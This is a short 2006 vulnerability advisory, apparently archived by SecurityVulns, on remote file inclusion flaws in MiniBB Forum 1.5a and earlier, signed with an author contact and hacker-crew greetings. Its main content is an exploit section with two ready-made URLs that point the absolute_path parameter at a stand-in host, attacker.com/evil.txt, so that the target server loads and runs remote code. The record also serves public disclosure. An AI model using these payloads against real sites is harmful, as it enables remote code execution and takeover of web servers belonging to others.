MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

2006-07-24T00:00:00
ID SECURITYVULNS:DOC:13549
Type securityvulns
Reporter Securityvulns
Modified 2006-07-24T00:00:00

Description


MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

Author : Matdhule

Contact : matdhule@gmail.com

Application : MiniBB Forum (com_minibb.php & index.php)

Version : 1.5a


Exploit :

http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt? http://[target]/[path]/components/minibb/index.php?absolute_path=http://attacker.com/evil.txt?


Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, & all crews #mardongan, #jambihackerlink @dalnet